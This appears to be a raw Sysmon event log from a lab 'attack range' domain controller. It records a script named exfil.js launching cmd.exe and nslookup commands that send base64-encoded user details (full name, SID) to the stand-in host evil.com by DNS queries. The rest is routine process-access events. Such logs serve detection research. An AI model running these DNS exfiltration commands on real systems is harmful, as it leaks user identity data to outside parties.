14:16:34.769{2E1864BB-17C2-629A-D440-000000005F02}33962632C:\Windows\system32\cmd.exe{2E1864BB-17C2-629A-D640-000000005F02}1648C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.781{2E1864BB-17C2-629A-D640-000000005F02}1648C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C2-629A-D440-000000005F02}3396C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnrzt.tmp 2>&1 22542200x8000000000000000201392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.541{00000000-0000-0000-0000-000000000000}7984evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.456{00000000-0000-0000-0000-000000000000}7488evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.378{00000000-0000-0000-0000-000000000000}6856evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.306{00000000-0000-0000-0000-000000000000}6712evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.223{00000000-0000-0000-0000-000000000000}4908evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.097{00000000-0000-0000-0000-000000000000}4808evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.971{00000000-0000-0000-0000-000000000000}2316evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.815{00000000-0000-0000-0000-000000000000}5956evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.723{00000000-0000-0000-0000-000000000000}6036evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.633{00000000-0000-0000-0000-000000000000}3776evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000201382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.753{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C2-629A-D540-000000005F02}3840C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.753{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C2-629A-D540-000000005F02}3840C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.738{2E1864BB-17C2-629A-D540-000000005F02}38407864C:\Windows\system32\conhost.exe{2E1864BB-17C2-629A-D440-000000005F02}3396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.722{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-D540-000000005F02}3840C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.722{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.722{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.722{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.722{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.722{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-D440-000000005F02}3396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.721{2E1864BB-17A1-629A-783D-000000005F02}55527456C:\Windows\System32\WScript.exe{2E1864BB-17C2-629A-D440-000000005F02}3396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.721{2E1864BB-17C2-629A-D440-000000005F02}3396C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnrzt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.717{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlngl.tmpMD5=FB87DC05AA42B3CEFD4C629E53F524B0,SHA256=D8FD32DBA2A6AFDF9B6B8FFC9EECC534FF5A98DB8AFE74AF80C8BC0F2B8F0CBD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.684{2E1864BB-17C2-629A-D240-000000005F02}18488104C:\Windows\system32\conhost.exe{2E1864BB-17C2-629A-D340-000000005F02}2192C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.684{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.684{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.684{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.684{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.684{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-D340-000000005F02}2192C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.684{2E1864BB-17C2-629A-D140-000000005F02}80727320C:\Windows\system32\cmd.exe{2E1864BB-17C2-629A-D340-000000005F02}2192C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.688{2E1864BB-17C2-629A-D340-000000005F02}2192C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C2-629A-D140-000000005F02}8072C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlngl.tmp 2>&1 10341000x8000000000000000201362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.652{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C2-629A-D240-000000005F02}1848C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.652{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C2-629A-D240-000000005F02}1848C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.652{2E1864BB-17C2-629A-D240-000000005F02}18488104C:\Windows\system32\conhost.exe{2E1864BB-17C2-629A-D140-000000005F02}8072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.637{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-D240-000000005F02}1848C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.637{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.637{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.637{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.621{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-D140-000000005F02}8072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 